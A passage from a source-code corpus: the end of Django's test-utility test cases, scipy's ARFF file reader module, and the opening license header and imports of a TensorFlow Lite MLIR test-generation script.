        with self.assertRaises(AssertionError):
            self.assertXMLEqual(xml1, xml2)

    def test_simple_equal_raises_message(self):
        """The failure message includes a diff of the two documents."""
        xml1 = "<elem attr1='a' />"
        xml2 = "<elem attr2='b' attr1='a' />"
        msg = '''{xml1} != {xml2}
- <elem attr1='a' />
+ <elem attr2='b' attr1='a' />
? ++++++++++
'''.format(xml1=repr(xml1), xml2=repr(xml2))
        with self.assertRaisesMessage(AssertionError, msg):
            self.assertXMLEqual(xml1, xml2)

    def test_simple_not_equal(self):
        xml1 = "<elem attr1='a' attr2='c' />"
        xml2 = "<elem attr1='a' attr2='b' />"
        self.assertXMLNotEqual(xml1, xml2)

    def test_simple_not_equal_raise(self):
        xml1 = "<elem attr1='a' attr2='b' />"
        xml2 = "<elem attr2='b' attr1='a' />"
        with self.assertRaises(AssertionError):
            self.assertXMLNotEqual(xml1, xml2)

    def test_parsing_errors(self):
        # Unparsable XML input makes the assertion itself fail.
        xml_unvalid = "<elem attr1='a attr2='b' />"
        xml2 = "<elem attr2='b' attr1='a' />"
        with self.assertRaises(AssertionError):
            self.assertXMLNotEqual(xml_unvalid, xml2)

    def test_comment_root(self):
        # Comments adjacent to the root element are ignored.
        xml1 = "<?xml version='1.0'?><!-- comment1 --><elem attr1='a' attr2='b' />"
        xml2 = "<?xml version='1.0'?><!-- comment2 --><elem attr2='b' attr1='a' />"
        self.assertXMLEqual(xml1, xml2)
class SkippingExtraTests(TestCase):
    """Fixture loading must not happen for tests that are skipped."""
    fixtures = ['should_not_be_loaded.json']

    # HACK: This depends on internals of our TestCase subclasses
    def __call__(self, result=None):
        # Detect fixture loading by counting SQL queries, should be zero
        with self.assertNumQueries(0):
            super(SkippingExtraTests, self).__call__(result)

    @unittest.skip("Fixture loading should not be performed for skipped tests.")
    def test_fixtures_are_skipped(self):
        pass
class AssertRaisesMsgTest(SimpleTestCase):
    """Tests for assertRaisesMessage() in both its context-manager and
    callable forms."""

    def test_assert_raises_message(self):
        msg = "'Expected message' not found in 'Unexpected message'"
        # context manager form of assertRaisesMessage()
        with self.assertRaisesMessage(AssertionError, msg):
            with self.assertRaisesMessage(ValueError, "Expected message"):
                raise ValueError("Unexpected message")

        # callable form
        def func():
            raise ValueError("Unexpected message")

        with self.assertRaisesMessage(AssertionError, msg):
            self.assertRaisesMessage(ValueError, "Expected message", func)

    def test_special_re_chars(self):
        """assertRaisesMessage shouldn't interpret RE special chars."""
        def func1():
            raise ValueError("[.*x+]y?")
        self.assertRaisesMessage(ValueError, "[.*x+]y?", func1)

    @ignore_warnings(category=RemovedInDjango20Warning)
    def test_callable_obj_param(self):
        # callable_obj was a documented kwarg in Django 1.8 and older.
        def func1():
            raise ValueError("[.*x+]y?")

        # Passing callable_obj= still works but must emit exactly one
        # deprecation warning with the documented message.
        with warnings.catch_warnings(record=True) as warns:
            warnings.simplefilter('always')
            self.assertRaisesMessage(ValueError, "[.*x+]y?", callable_obj=func1)
        self.assertEqual(len(warns), 1)
        self.assertEqual(
            str(warns[0].message),
            'The callable_obj kwarg is deprecated. Pass the callable '
            'as a positional argument instead.'
        )
class AssertFieldOutputTests(SimpleTestCase):
    """Exercise assertFieldOutput() against a stock and a customized field."""

    def test_assert_field_output(self):
        error_invalid = ['Enter a valid email address.']
        # A matching valid/invalid specification passes outright.
        self.assertFieldOutput(EmailField, {'a@a.com': 'a@a.com'}, {'aaa': error_invalid})
        # Any divergence -- extra errors, wrong cleaned value, or a wrong
        # error message -- must raise AssertionError.
        with self.assertRaises(AssertionError):
            self.assertFieldOutput(EmailField, {'a@a.com': 'a@a.com'}, {'aaa': error_invalid + ['Another error']})
        with self.assertRaises(AssertionError):
            self.assertFieldOutput(EmailField, {'a@a.com': 'Wrong output'}, {'aaa': error_invalid})
        with self.assertRaises(AssertionError):
            self.assertFieldOutput(EmailField, {'a@a.com': 'a@a.com'}, {'aaa': ['Come on, gimme some well formatted data, dude.']})

    def test_custom_required_message(self):
        class MyCustomField(IntegerField):
            default_error_messages = {
                'required': 'This is really required.',
            }
        self.assertFieldOutput(MyCustomField, {}, {}, empty_value=None)
class FirstUrls:
    # Minimal URLconf used by OverrideSettingsTests to exercise URL-cache
    # invalidation when ROOT_URLCONF is overridden.
    urlpatterns = [url(r'first/$', empty_response, name='first')]
class SecondUrls:
    # Companion URLconf to FirstUrls; exposes a different named pattern.
    urlpatterns = [url(r'second/$', empty_response, name='second')]
class OverrideSettingsTests(SimpleTestCase):
    """Overriding a setting must immediately propagate to every module-level
    cache that depends on it (URL resolver, storages, staticfiles, routers)."""

    # #21518 -- If neither override_settings nor a setting_changed receiver
    # clears the URL cache between tests, then one of test_first or
    # test_second will fail.
    @override_settings(ROOT_URLCONF=FirstUrls)
    def test_urlconf_first(self):
        reverse('first')

    @override_settings(ROOT_URLCONF=SecondUrls)
    def test_urlconf_second(self):
        reverse('second')

    def test_urlconf_cache(self):
        """Only names from the active (possibly nested) ROOT_URLCONF
        override resolve; leaving a block restores the previous URLconf."""
        self.assertRaises(NoReverseMatch, lambda: reverse('first'))
        self.assertRaises(NoReverseMatch, lambda: reverse('second'))

        with override_settings(ROOT_URLCONF=FirstUrls):
            self.client.get(reverse('first'))
            self.assertRaises(NoReverseMatch, lambda: reverse('second'))

            with override_settings(ROOT_URLCONF=SecondUrls):
                self.assertRaises(NoReverseMatch, lambda: reverse('first'))
                self.client.get(reverse('second'))

            # Exiting the nested override restores the outer URLconf.
            self.client.get(reverse('first'))
            self.assertRaises(NoReverseMatch, lambda: reverse('second'))

        self.assertRaises(NoReverseMatch, lambda: reverse('first'))
        self.assertRaises(NoReverseMatch, lambda: reverse('second'))

    def test_override_media_root(self):
        """
        Overriding the MEDIA_ROOT setting should be reflected in the
        base_location attribute of django.core.files.storage.default_storage.
        """
        self.assertEqual(default_storage.base_location, '')
        with self.settings(MEDIA_ROOT='test_value'):
            self.assertEqual(default_storage.base_location, 'test_value')

    def test_override_media_url(self):
        """
        Overriding the MEDIA_URL setting should be reflected in the
        base_url attribute of django.core.files.storage.default_storage.
        """
        self.assertEqual(default_storage.base_location, '')
        with self.settings(MEDIA_URL='/test_value/'):
            self.assertEqual(default_storage.base_url, '/test_value/')

    def test_override_file_upload_permissions(self):
        """
        Overriding the FILE_UPLOAD_PERMISSIONS setting should be reflected in
        the file_permissions_mode attribute of
        django.core.files.storage.default_storage.
        """
        self.assertIsNone(default_storage.file_permissions_mode)
        with self.settings(FILE_UPLOAD_PERMISSIONS=0o777):
            self.assertEqual(default_storage.file_permissions_mode, 0o777)

    def test_override_file_upload_directory_permissions(self):
        """
        Overriding the FILE_UPLOAD_DIRECTORY_PERMISSIONS setting should be
        reflected in the directory_permissions_mode attribute of
        django.core.files.storage.default_storage.
        """
        self.assertIsNone(default_storage.directory_permissions_mode)
        with self.settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777):
            self.assertEqual(default_storage.directory_permissions_mode, 0o777)

    def test_override_database_routers(self):
        """
        Overriding DATABASE_ROUTERS should update the master router.
        """
        test_routers = (object(),)
        with self.settings(DATABASE_ROUTERS=test_routers):
            self.assertSequenceEqual(router.routers, test_routers)

    def test_override_static_url(self):
        """
        Overriding the STATIC_URL setting should be reflected in the
        base_url attribute of
        django.contrib.staticfiles.storage.staticfiles_storage.
        """
        with self.settings(STATIC_URL='/test/'):
            self.assertEqual(staticfiles_storage.base_url, '/test/')

    def test_override_static_root(self):
        """
        Overriding the STATIC_ROOT setting should be reflected in the
        location attribute of
        django.contrib.staticfiles.storage.staticfiles_storage.
        """
        with self.settings(STATIC_ROOT='/tmp/test'):
            self.assertEqual(staticfiles_storage.location, abspathu('/tmp/test'))

    def test_override_staticfiles_storage(self):
        """
        Overriding the STATICFILES_STORAGE setting should be reflected in
        the value of django.contrib.staticfiles.storage.staticfiles_storage.
        """
        new_class = 'CachedStaticFilesStorage'
        new_storage = 'django.contrib.staticfiles.storage.' + new_class
        with self.settings(STATICFILES_STORAGE=new_storage):
            self.assertEqual(staticfiles_storage.__class__.__name__, new_class)

    def test_override_staticfiles_finders(self):
        """
        Overriding the STATICFILES_FINDERS setting should be reflected in
        the return value of django.contrib.staticfiles.finders.get_finders.
        """
        current = get_finders()
        self.assertGreater(len(list(current)), 1)
        finders = ['django.contrib.staticfiles.finders.FileSystemFinder']
        with self.settings(STATICFILES_FINDERS=finders):
            self.assertEqual(len(list(get_finders())), len(finders))

    def test_override_staticfiles_dirs(self):
        """
        Overriding the STATICFILES_DIRS setting should be reflected in
        the locations attribute of the
        django.contrib.staticfiles.finders.FileSystemFinder instance.
        """
        finder = get_finder('django.contrib.staticfiles.finders.FileSystemFinder')
        test_path = '/tmp/test'
        expected_location = ('', test_path)
        self.assertNotIn(expected_location, finder.locations)
        with self.settings(STATICFILES_DIRS=[test_path]):
            # The finder must be re-fetched: overriding the setting creates
            # a fresh instance.
            finder = get_finder('django.contrib.staticfiles.finders.FileSystemFinder')
            self.assertIn(expected_location, finder.locations)
class TestBadSetUpTestData(TestCase):
    """
    An exception in setUpTestData() shouldn't leak a transaction which would
    cascade across the rest of the test suite.
    """
    class MyException(Exception):
        pass

    @classmethod
    def setUpClass(cls):
        try:
            super(TestBadSetUpTestData, cls).setUpClass()
        except cls.MyException:
            # Record whether the broken setUpTestData() left an atomic
            # block open; the test method below asserts it did not.
            cls._in_atomic_block = connection.in_atomic_block

    @classmethod
    def tearDownClass(cls):
        # Fixed naming: the parameter was previously `Cls`, breaking the
        # `cls` convention used by every other classmethod in this file.
        # override to avoid a second cls._rollback_atomics() which would fail.
        # Normal setUpClass() methods won't have exception handling so this
        # method wouldn't typically be run.
        pass

    @classmethod
    def setUpTestData(cls):
        # Simulate a broken setUpTestData() method.
        raise cls.MyException()

    def test_failure_in_setUpTestData_should_rollback_transaction(self):
        # setUpTestData() should call _rollback_atomics() so that the
        # transaction doesn't leak.
        self.assertFalse(self._in_atomic_block)
class DisallowedDatabaseQueriesTests(SimpleTestCase):
    """By default, SimpleTestCase refuses to run database queries."""

    def test_disallowed_database_queries(self):
        expected_message = (
            "Database queries aren't allowed in SimpleTestCase. "
            "Either use TestCase or TransactionTestCase to ensure proper test isolation or "
            "set DisallowedDatabaseQueriesTests.allow_database_queries to True to silence this failure."
        )
        with self.assertRaisesMessage(AssertionError, expected_message):
            Car.objects.first()
class AllowedDatabaseQueriesTests(SimpleTestCase):
    """Setting allow_database_queries = True opts a SimpleTestCase back in
    to database access."""
    allow_database_queries = True

    def test_allowed_database_queries(self):
        Car.objects.first()
| bsd-3-clause |
jlcarmic/producthunt_simulator | venv/lib/python2.7/site-packages/scipy/io/arff/arffread.py | 11 | 20186 | #! /usr/bin/env python
# Last Change: Mon Aug 20 08:00 PM 2007 J
from __future__ import division, print_function, absolute_import
import re
import itertools
import datetime
from functools import partial
import numpy as np
from scipy._lib.six import next
"""A module to read arff files."""
__all__ = ['MetaData', 'loadarff', 'ArffError', 'ParseArffError']
# An Arff file is basically two parts:
# - header
# - data
#
# A header has each of its components starting by @META where META is one of
# the keyword (attribute of relation, for now).
# TODO:
# - both integer and reals are treated as numeric -> the integer info
# is lost!
# - Replace ValueError by ParseError or something
# We know can handle the following:
# - numeric and nominal attributes
# - missing values for numeric attributes
# Recognize any header meta line (@relation, @attribute, @data, ...).
# FIX: the pattern is now a raw string -- '\s' in a plain string literal is
# an invalid escape sequence (DeprecationWarning in modern Python).
r_meta = re.compile(r'^\s*@')
# Match a comment
r_comment = re.compile(r'^%')
# Match an empty line
r_empty = re.compile(r'^\s+$')
# Match a header line, that is a line which starts by @ + a word
r_headerline = re.compile(r'^@\S*')
r_datameta = re.compile(r'^@[Dd][Aa][Tt][Aa]')
r_relation = re.compile(r'^@[Rr][Ee][Ll][Aa][Tt][Ii][Oo][Nn]\s*(\S*)')
r_attribute = re.compile(r'^@[Aa][Tt][Tt][Rr][Ii][Bb][Uu][Tt][Ee]\s*(..*$)')

# To get attributes name enclosed with ''
r_comattrval = re.compile(r"'(..+)'\s+(..+$)")
# To get attributes name enclosed with '', possibly spread across multilines
r_mcomattrval = re.compile(r"'([..\n]+)'\s+(..+$)")
# To get normal attributes
r_wcomattrval = re.compile(r"(\S+)\s+(..+$)")
#-------------------------
# Module defined exception
#-------------------------
class ArffError(IOError):
    """Base error raised for any failure while reading an ARFF file."""
    pass
class ParseArffError(ArffError):
    """Raised when the content of an ARFF file cannot be parsed."""
    pass
#------------------
# Various utilities
#------------------
# An attribute is defined as @attribute name value
def parse_type(attrtype):
    """Given an arff attribute value (meta data), returns its type.

    Expect the value to be a name.

    Parameters
    ----------
    attrtype : str
        Raw type declaration from an @attribute line.

    Returns
    -------
    str
        One of 'nominal', 'numeric', 'string', 'relational' or 'date'.

    Raises
    ------
    ParseArffError
        If the declaration matches no known type.
    """
    uattribute = attrtype.lower().strip()
    if uattribute.startswith('{'):
        return 'nominal'
    # Ordered prefix -> canonical type table. Integers and reals collapse
    # to 'numeric': this reader treats them all as floats.
    for prefix, canonical in (('real', 'numeric'),
                              ('integer', 'numeric'),
                              ('numeric', 'numeric'),
                              ('string', 'string'),
                              ('relational', 'relational'),
                              ('date', 'date')):
        if uattribute.startswith(prefix):
            return canonical
    raise ParseArffError("unknown attribute %s" % uattribute)
def get_nominal(attribute):
    """Return the comma-separated values of a nominal attribute as a list."""
    values = attribute.split(',')
    return values
def read_data_list(ofile):
    """Read each line of the iterable and put it in a list.

    Parameters
    ----------
    ofile : iterable of str
        Line iterator positioned at the start of the data section.

    Returns
    -------
    list of str
        All remaining lines.

    Raises
    ------
    ValueError
        If the first line starts with '{' (sparse ARFF, unsupported).
    """
    data = [next(ofile)]
    if data[0].strip()[0] == '{':
        raise ValueError("This looks like a sparse ARFF: not supported yet")
    # Consume the iterator directly; no throwaway intermediate list needed.
    data.extend(ofile)
    return data
def get_ndata(ofile):
    """Read the whole file to get number of data attributes.

    Rejects sparse ARFF data (first line starting with '{').
    """
    first_line = next(ofile)
    if first_line.strip()[0] == '{':
        raise ValueError("This looks like a sparse ARFF: not supported yet")
    # The first line has already been consumed, so start counting at one.
    count = 1
    for _ in ofile:
        count += 1
    return count
def maxnomlen(atrv):
    """Return the string length of the longest value in a nominal type.

    A nominal type is defined as something framed between braces ({}).

    Parameters
    ----------
    atrv : str
        Nominal type definition

    Returns
    -------
    slen : int
        length of longest component

    Examples
    --------
    maxnomlen("{floup, bouga, fl, ratata}") returns 6 (the size of
    ratata, the longest nominal value).

    >>> maxnomlen("{floup, bouga, fl, ratata}")
    6
    """
    return max(len(value) for value in get_nom_val(atrv))
def get_nom_val(atrv):
    """Given a string containing a nominal type, returns a tuple of the
    possible values.

    A nominal type is defined as something framed between braces ({}).

    Parameters
    ----------
    atrv : str
        Nominal type definition

    Returns
    -------
    poss_vals : tuple
        possible values

    Examples
    --------
    >>> get_nom_val("{floup, bouga, fl, ratata}")
    ('floup', 'bouga', 'fl', 'ratata')
    """
    match = re.compile('{(.+)}').match(atrv)
    if match is None:
        raise ValueError("This does not look like a nominal string")
    return tuple(value.strip() for value in match.group(1).split(','))
def get_date_format(atrv):
    """Extract and translate the date pattern of a date attribute.

    Java SimpleDateFormat tokens (yyyy/yy, MM, dd, HH, mm, ss) are
    translated to the equivalent C strftime directives.

    Parameters
    ----------
    atrv : str
        Attribute declaration, e.g. ``date 'yyyy-MM-dd'``.

    Returns
    -------
    pattern : str
        strftime-compatible format string.
    datetime_unit : str
        Finest numpy datetime64 unit used ('Y', 'M', 'D', 'h', 'm' or 's').

    Raises
    ------
    ValueError
        If no date pattern is present, the pattern contains a time zone
        (unsupported), or no recognized token is found.
    """
    r_date = re.compile(r"[Dd][Aa][Tt][Ee]\s+[\"']?(.+?)[\"']?$")
    m = r_date.match(atrv)
    if m:
        pattern = m.group(1).strip()
        # convert time pattern from Java's SimpleDateFormat to C's format
        datetime_unit = None
        if "yyyy" in pattern:
            pattern = pattern.replace("yyyy", "%Y")
            datetime_unit = "Y"
        elif "yy" in pattern:
            # BUG FIX: was `elif "yy":`, which is always truthy, so patterns
            # without any year token silently got unit "Y" instead of
            # falling through to the "unsupported format" error below.
            pattern = pattern.replace("yy", "%y")
            datetime_unit = "Y"
        if "MM" in pattern:
            pattern = pattern.replace("MM", "%m")
            datetime_unit = "M"
        if "dd" in pattern:
            pattern = pattern.replace("dd", "%d")
            datetime_unit = "D"
        if "HH" in pattern:
            pattern = pattern.replace("HH", "%H")
            datetime_unit = "h"
        if "mm" in pattern:
            pattern = pattern.replace("mm", "%M")
            datetime_unit = "m"
        if "ss" in pattern:
            pattern = pattern.replace("ss", "%S")
            datetime_unit = "s"
        if "z" in pattern or "Z" in pattern:
            raise ValueError("Date type attributes with time zone not "
                             "supported, yet")

        if datetime_unit is None:
            raise ValueError("Invalid or unsupported date format")

        return pattern, datetime_unit
    else:
        raise ValueError("Invalid or no date format")
def go_data(ofile):
    """Skip the ARFF header.

    The first next() call of the returned iterator will be the @data line.
    """
    return itertools.dropwhile(lambda line: r_datameta.match(line) is None,
                               ofile)
#----------------
# Parsing header
#----------------
def tokenize_attribute(iterable, attribute):
    """Parse a raw string in header (eg starts by @attribute).

    Given a raw string attribute, try to get the name and type of the
    attribute. Constraints:

    * The first line must start with @attribute (case insensitive, and
      space like characters before @attribute are allowed)
    * Works also if the attribute is spread on multilines.
    * Works if empty lines or comments are in between

    Parameters
    ----------
    attribute : str
        the attribute string.

    Returns
    -------
    name : str
        name of the attribute
    value : str
        value of the attribute
    next : str
        next line to be parsed

    Examples
    --------
    If attribute is a string defined in python as r"floupi real", will
    return floupi as name, and real as value.

    >>> iterable = iter([0] * 10) # dummy iterator
    >>> tokenize_attribute(iterable, r"@attribute floupi real")
    ('floupi', 'real', 0)

    If attribute is r"'floupi 2' real", will return 'floupi 2' as name,
    and real as value.

    >>> tokenize_attribute(iterable, r" @attribute 'floupi 2' real   ")
    ('floupi 2', 'real', 0)
    """
    sattr = attribute.strip()
    mattr = r_attribute.match(sattr)
    if mattr:
        # atrv is everything after @attribute
        atrv = mattr.group(1)
        # Order matters: the quoted-name form must be tried before the
        # bare-name form, since a quoted name also contains non-space runs.
        if r_comattrval.match(atrv):
            name, type = tokenize_single_comma(atrv)
            next_item = next(iterable)
        elif r_wcomattrval.match(atrv):
            name, type = tokenize_single_wcomma(atrv)
            next_item = next(iterable)
        else:
            # Not sure we should support this, as it does not seem supported by
            # weka.
            raise ValueError("multi line not supported yet")
            #name, type, next_item = tokenize_multilines(iterable, atrv)
    else:
        raise ValueError("First line unparsable: %s" % sattr)

    if type == 'relational':
        raise ValueError("relational attributes not supported yet")
    return name, type, next_item
def tokenize_single_comma(val):
    """Split a quoted-name attribute declaration into (name, type).

    Expects *val* to match ``r_comattrval``: a name wrapped in single
    quotes, whitespace, then the type declaration.
    """
    # XXX we match twice the same string (here and at the caller level). It is
    # stupid, but it is easier for now...
    m = r_comattrval.match(val)
    if not m:
        raise ValueError("Error while tokenizing single %s" % val)
    try:
        return m.group(1).strip(), m.group(2).strip()
    except IndexError:
        raise ValueError("Error while tokenizing attribute")
def tokenize_single_wcomma(val):
    """Split an unquoted attribute declaration into (name, type).

    Expects *val* to match ``r_wcomattrval``: a bare name, whitespace,
    then the type declaration. Mirrors tokenize_single_comma().
    """
    # XXX we match twice the same string (here and at the caller level). It is
    # stupid, but it is easier for now...
    m = r_wcomattrval.match(val)
    if not m:
        raise ValueError("Error while tokenizing single %s" % val)
    try:
        return m.group(1).strip(), m.group(2).strip()
    except IndexError:
        raise ValueError("Error while tokenizing attribute")
def read_header(ofile):
    """Read the header of the iterable ofile.

    Consumes lines up to (and including) the @data marker.

    Returns
    -------
    relation : str or None
        Value of the @relation declaration, if one was present.
    attributes : list of (str, str)
        (name, raw-type-string) pairs, one per @attribute line, in order.
    """
    i = next(ofile)

    # Pass first comments
    while r_comment.match(i):
        i = next(ofile)

    # Header is everything up to DATA attribute ?
    relation = None
    attributes = []
    while not r_datameta.match(i):
        m = r_headerline.match(i)
        if m:
            isattr = r_attribute.match(i)
            if isattr:
                # tokenize_attribute() consumes the following line and
                # returns it, so don't advance the iterator again here.
                name, type, i = tokenize_attribute(ofile, i)
                attributes.append((name, type))
            else:
                isrel = r_relation.match(i)
                if isrel:
                    relation = isrel.group(1)
                else:
                    raise ValueError("Error parsing line %s" % i)
                i = next(ofile)
        else:
            # Non-header line (blank/comment) inside the header: skip it.
            i = next(ofile)

    return relation, attributes
#--------------------
# Parsing actual data
#--------------------
def safe_float(x):
    """given a string x, convert it to a float. If the stripped string is a ?,
    return a Nan (missing value).

    Parameters
    ----------
    x : str
        string to convert

    Returns
    -------
    f : float
        where float can be nan

    Examples
    --------
    >>> safe_float('1')
    1.0
    >>> safe_float('1\\n')
    1.0
    >>> safe_float('?\\n')
    nan
    """
    return np.nan if '?' in x else float(x)
def safe_nominal(value, pvalue):
    """Validate a nominal value against its allowed set.

    Returns the stripped value if it is one of *pvalue* or the missing
    marker '?'; raises ValueError otherwise.
    """
    svalue = value.strip()
    if svalue in pvalue or svalue == '?':
        return svalue
    raise ValueError("%s value not in %s" % (str(svalue), str(pvalue)))
def safe_date(value, date_format, datetime_unit):
    """Convert an ARFF date string to a numpy datetime64.

    The missing marker '?' maps to NaT; surrounding quotes are stripped
    before parsing with *date_format* (a strftime pattern).
    """
    token = value.strip().strip("'").strip('"')
    if token == '?':
        return np.datetime64('NaT', datetime_unit)
    parsed = datetime.datetime.strptime(token, date_format)
    return np.datetime64(parsed).astype("datetime64[%s]" % datetime_unit)
class MetaData(object):
    """Small container to keep useful informations on a ARFF dataset.

    Knows about attributes names and types.

    Examples
    --------
    ::

        data, meta = loadarff('iris.arff')
        # This will print the attributes names of the iris.arff dataset
        for i in meta:
            print i
        # This works too
        meta.names()
        # Getting attribute type
        types = meta.types()

    Notes
    -----
    Also maintains the list of attributes in order, i.e. doing for i in
    meta, where meta is an instance of MetaData, will return the
    different attribute names in the order they were defined.
    """
    def __init__(self, rel, attr):
        self.name = rel
        # Attribute order matters and plain dicts were unordered when this
        # was written, so names are tracked in a separate list.
        self._attributes = {}
        self._attrnames = []
        for attr_name, attr_value in attr:
            tp = parse_type(attr_value)
            self._attrnames.append(attr_name)
            if tp == 'nominal':
                extra = get_nom_val(attr_value)
            elif tp == 'date':
                extra = get_date_format(attr_value)[0]
            else:
                extra = None
            self._attributes[attr_name] = (tp, extra)

    def __repr__(self):
        pieces = ["Dataset: %s\n" % self.name]
        for attr_name in self._attrnames:
            tp, rng = self._attributes[attr_name]
            descr = "\t%s's type is %s" % (attr_name, tp)
            if rng:
                descr += ", range is %s" % str(rng)
            pieces.append(descr + '\n')
        return "".join(pieces)

    def __iter__(self):
        return iter(self._attrnames)

    def __getitem__(self, key):
        return self._attributes[key]

    def names(self):
        """Return the list of attribute names."""
        return self._attrnames

    def types(self):
        """Return the list of attribute types."""
        return [self._attributes[attr_name][0]
                for attr_name in self._attrnames]
def loadarff(f):
    """
    Read an arff file.

    The data is returned as a record array, which can be accessed much like
    a dictionary of numpy arrays. For example, if one of the attributes is
    called 'pressure', then its first 10 data points can be accessed from the
    ``data`` record array like so: ``data['pressure'][0:10]``


    Parameters
    ----------
    f : file-like or str
        File-like object to read from, or filename to open.

    Returns
    -------
    data : record array
        The data of the arff file, accessible by attribute names.
    meta : `MetaData`
        Contains information about the arff file such as name and
        type of attributes, the relation (name of the dataset), etc...

    Raises
    ------
    ParseArffError
        This is raised if the given file is not ARFF-formatted.
    NotImplementedError
        The ARFF file has an attribute which is not supported yet.

    Notes
    -----

    This function should be able to read most arff files. Not
    implemented functionality include:

    * string type attributes

    It can read files with numeric, nominal and date attributes. It cannot
    read files with sparse data ({} in the file). However, this function
    can read files with missing data (? in the file), representing the
    data points as NaNs.

    Examples
    --------
    >>> from scipy.io import arff
    >>> from cStringIO import StringIO
    >>> content = \"\"\"
    ... @relation foo
    ... @attribute width  numeric
    ... @attribute height numeric
    ... @attribute color  {red,green,blue,yellow,black}
    ... @data
    ... 5.0,3.25,blue
    ... 4.5,3.75,green
    ... 3.0,4.00,red
    ... \"\"\"
    >>> f = StringIO(content)
    >>> data, meta = arff.loadarff(f)
    >>> data
    array([(5.0, 3.25, 'blue'), (4.5, 3.75, 'green'), (3.0, 4.0, 'red')],
          dtype=[('width', '<f8'), ('height', '<f8'), ('color', '|S6')])
    >>> meta
    Dataset: foo
    \twidth's type is numeric
    \theight's type is numeric
    \tcolor's type is nominal, range is ('red', 'green', 'blue', 'yellow', 'black')

    """
    # Accept either an open file-like object or a path to open ourselves.
    if hasattr(f, 'read'):
        ofile = f
    else:
        ofile = open(f, 'rt')
    try:
        return _loadarff(ofile)
    finally:
        if ofile is not f:  # only close what we opened
            ofile.close()
def _loadarff(ofile):
    """Parse an open ARFF file object into (record array, MetaData).

    Reads the header to build per-attribute dtype descriptors and value
    convertors, then streams the data section into a numpy record array.
    Raises ParseArffError on malformed headers and NotImplementedError
    for string attributes.
    """
    # Parse the header file
    try:
        rel, attr = read_header(ofile)
    except ValueError as e:
        msg = "Error while parsing header, error was: " + str(e)
        raise ParseArffError(msg)
    # Check whether we have a string attribute (not supported yet)
    hasstr = False
    for name, value in attr:
        type = parse_type(value)
        if type == 'string':
            hasstr = True
    meta = MetaData(rel, attr)
    # XXX The following code is not great
    # Build the type descriptor descr and the list of convertors to convert
    # each attribute to the suitable type (which should match the one in
    # descr).
    # This can be used once we want to support integer as integer values and
    # not as numeric anymore (using masked arrays ?).
    acls2dtype = {'real': float, 'integer': float, 'numeric': float}
    acls2conv = {'real': safe_float,
                 'integer': safe_float,
                 'numeric': safe_float}
    descr = []
    convertors = []
    if not hasstr:
        for name, value in attr:
            type = parse_type(value)
            if type == 'date':
                date_format, datetime_unit = get_date_format(value)
                descr.append((name, "datetime64[%s]" % datetime_unit))
                convertors.append(partial(safe_date, date_format=date_format,
                                          datetime_unit=datetime_unit))
            elif type == 'nominal':
                # Nominal values are stored as fixed-width byte strings sized
                # to the longest declared value.
                n = maxnomlen(value)
                descr.append((name, 'S%d' % n))
                pvalue = get_nom_val(value)
                convertors.append(partial(safe_nominal, pvalue=pvalue))
            else:
                # real/integer/numeric all map to float (see acls2dtype).
                descr.append((name, acls2dtype[type]))
                convertors.append(safe_float)
            #dc.append(acls2conv[type])
            #sdescr.append((name, acls2sdtype[type]))
    else:
        # How to support string efficiently ? Ideally, we should know the max
        # size of the string before allocating the numpy array.
        raise NotImplementedError("String attributes not supported yet, sorry")
    ni = len(convertors)
    def generator(row_iter, delim=','):
        # Yields one converted tuple per data row, skipping comment lines
        # (starting with %) and empty lines.
        # TODO: this is where we are spending times (~80%). I think things
        # could be made more efficiently:
        #   - We could for example "compile" the function, because some values
        #   do not change here.
        #   - The function to convert a line to dtyped values could also be
        #   generated on the fly from a string and be executed instead of
        #   looping.
        #   - The regex are overkill: for comments, checking that a line starts
        #   by % should be enough and faster, and for empty lines, same thing
        #   --> this does not seem to change anything.
        # We do not abstract skipping comments and empty lines for performances
        # reason.
        raw = next(row_iter)
        while r_empty.match(raw) or r_comment.match(raw):
            raw = next(row_iter)
        # 'compiling' the range since it does not change
        # Note, I have already tried zipping the converters and
        # row elements and got slightly worse performance.
        elems = list(range(ni))
        row = raw.split(delim)
        yield tuple([convertors[i](row[i]) for i in elems])
        for raw in row_iter:
            while r_comment.match(raw) or r_empty.match(raw):
                raw = next(row_iter)
            row = raw.split(delim)
            yield tuple([convertors[i](row[i]) for i in elems])
    a = generator(ofile)
    # No error should happen here: it is a bug otherwise
    data = np.fromiter(a, descr)
    return data, meta
#-----
# Misc
#-----
def basic_stats(data):
    """Return (min, max, mean, sample std) of *data*.

    Min and max ignore NaNs; the standard deviation uses Bessel's
    correction (ddof=1).
    """
    # The old code computed ``np.std(data) * N/(N-1)``, which is neither the
    # population nor the sample standard deviation -- the N/(N-1) factor
    # belongs under the square root.  ddof=1 applies it correctly.
    return np.nanmin(data), np.nanmax(data), np.mean(data), np.std(data, ddof=1)
def print_attribute(name, tp, data):
    """Print one summary line for attribute *name*.

    Numeric attributes get "name,type,min,max,mean,std"; nominal ones get
    their declared value set, e.g. ``color,{red,green}``.
    """
    attr_type = tp[0]
    if attr_type in ('numeric', 'real', 'integer'):
        lo, hi, mean, std = basic_stats(data)
        print("%s,%s,%f,%f,%f,%f" % (name, attr_type, lo, hi, mean, std))
    else:
        print(name + ",{" + ",".join(tp[1]) + "}")
def test_weka(filename):
    """Load *filename* and print a summary of every attribute (smoke check)."""
    data, meta = loadarff(filename)
    print(len(data.dtype))
    print(data.size)
    for attr_name in meta:
        print_attribute(attr_name, meta[attr_name], data[attr_name])
# make sure nose does not find this as a test
test_weka.__test__ = False
if __name__ == '__main__':
    import sys
    # Usage: python arffread.py <file.arff>
    test_weka(sys.argv[1])
| mit |
tensorflow/tensorflow | tensorflow/lite/experimental/mlir/testing/generate_examples.py | 2 | 9597 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generates a series of test cases using MLIR-based conversion."""
# This is forked from `tensorflow/lite/testing/generate_examples.py`.
# TODO(b/136499575): Merge this back to TFLite codebase when open sourcing.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import sys
import tensorflow.compat.v1 as tf
from tensorflow.lite.experimental.mlir.testing import mlir_convert
# pylint: disable=unused-import
